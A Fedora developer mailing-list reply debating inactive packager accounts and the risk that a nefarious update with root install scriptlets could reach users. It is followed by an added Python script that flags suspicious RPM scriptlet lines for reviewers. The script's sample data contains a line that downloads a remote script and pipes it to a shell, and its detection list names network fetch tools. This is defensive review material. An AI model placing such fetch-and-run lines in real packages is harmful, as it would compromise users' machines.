On Sat, Feb 12, 2022 at 12:00:11PM +0100, Vitaly Zaitsev via devel wrote:
> On 11/02/2022 07:54, Zbigniew Jędrzejewski-Szmek wrote:
> > With 1500+ unused accounts it is just *too easy*
> > for someone to find a way to access one of the accounts in an unauthorized
> > way.
>
> What can they do with this? Pushing a new update for the foo-bar package? We
> have Bodhi against this.

Let's talk about distro security basics. All packages are "equal": any
package can ship any file, and in fact any package can execute scripts
*as root* during installation. Thus, if you are able to create a build
that is submitted as an update (i.e. either build it for rawhide, or
build it for other releases and create a bodhi update), this is enough
to wreak havoc at least on machines of people who use rawhide /
updates-testing. As you certainly know, many updates don't receive any
feedback, and almost all updates receive no scrutiny if they install
without errors. Thus a nefarious update would have fairly high chances
of going stable too. I suppose that at some point it would be noticed,
and the update pulled and the account deactivated, but there is no
automatic process for this. Bodhi runs tests, but not the kinds of
tests that would help in any way against a nefarious update.

> > In particular, if we removed the 'packager' bit, people would still
> > have the account and all history associated with it.
>
> If you remove "packager" status, this user will probably leave Fedora.
>
> Maintainers are the main value of the distribution. We shouldn't offend
> them and force them to leave Fedora.

We certainly don't want to push maintainers away. In fact this whole
thread is primarily about striking the right balance between security
and the desire not to inconvenience maintainers.

> > For the identified users with no activity, I suppose that sending one
> > email per year asking "hey, is this still your email account and are you
> > still engaged in Fedora packaging" would be no harm.

[It was actually Mattia who wrote this, not me.]

The case of "one email per year" applies to the case of accounts which
are detected as inactive each year (i.e. effectively have no koji
activity over many years) *and* the packager in question replies each
year that they want to keep the account active. So such repeated mails
should be a very rare occurrence.

> And you make life easier for potential hackers.
>
> They will simply copy this email and send it to all Fedora contributors.
> Some of them will follow the link and hackers will get a lot of real working
> accounts.

Ehh, I don't think so. There are many automated emails being sent by
our infra. If a hacker wants to send a phishing email, they might just
as well spoof a bugzilla ticket or a pagure notification.

If we are about to downgrade an account, sending an email is the least
we should do.

Zbyszek
_______________________________________________
devel mailing list -- devel@xxxxxxxxxxxxxxxxxxxxxxx
To unsubscribe send an email to devel-leave@xxxxxxxxxxxxxxxxxxxxxxx
Fedora Code of Conduct: https://docs.fedoraproject.org/en-US/project/code-of-conduct/
List Guidelines: https://fedoraproject.org/wiki/Mailing_list_guidelines
List Archives: https://lists.fedoraproject.org/archives/list/devel@xxxxxxxxxxxxxxxxxxxxxxx
Do not reply to spam on the list, report it: https://pagure.io/fedora-infrastructure
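The point above that any package can run scripts as root at install time is something a tester of updates-testing can check for before giving karma. The following is an added example, not code from the thread or from Fedora infrastructure: it splits the output of `rpm -qp --scripts` into its scriptlets and flags lines a reviewer should read by hand. The sample output and the package name in it are constructed, and the list of flagged patterns is an assumption about what deserves a second look.

```python
"""Split `rpm -qp --scripts <pkg.rpm>` output into scriptlets for review."""
import re

# Constructed sample of `rpm -qp --scripts foo-bar-1.0-1.fc36.x86_64.rpm`
# (hypothetical package; the curl line is the kind of thing to catch).
SAMPLE = """\
preinstall scriptlet (using /bin/sh):
getent group foobar >/dev/null || groupadd -r foobar
postinstall scriptlet (using /bin/sh):
/sbin/ldconfig
curl -s https://example.invalid/setup.sh | sh
postuninstall program: /sbin/ldconfig
"""

# Matches rpm's section headers, e.g. "postinstall scriptlet (using /bin/sh):"
# and the bodiless "postuninstall program: /sbin/ldconfig" form.
HEADER = re.compile(r"^(\w+) (scriptlet|program)(?: \(using (\S+)\))?:\s*(.*)$")

# Assumed reviewer heuristics: network fetches, piping into a shell, encoded blobs.
SUSPICIOUS = ("curl", "wget", "| sh", "| bash", "base64")


def parse_scriptlets(text):
    """Return {scriptlet_name: [non-empty body lines]} from --scripts output."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            name, kind, _interp, rest = m.groups()
            current = name
            # "program:" names an interpreter/command with no script body.
            scripts[current] = [rest] if kind == "program" else []
        elif current is not None and line.strip():
            scripts[current].append(line)
    return scripts


def review_flags(scripts):
    """Return (scriptlet, line) pairs that a human should read before karma."""
    return [(name, line) for name, lines in scripts.items()
            for line in lines if any(s in line for s in SUSPICIOUS)]


if __name__ == "__main__":
    found = parse_scriptlets(SAMPLE)
    for name, lines in found.items():
        print(f"{name}: {len(lines)} line(s) run as root")
    for name, line in review_flags(found):
        print(f"REVIEW {name}: {line}")
```

On a real update, feed it `subprocess.run(["rpm", "-qp", "--scripts", path], capture_output=True, text=True).stdout` instead of `SAMPLE`.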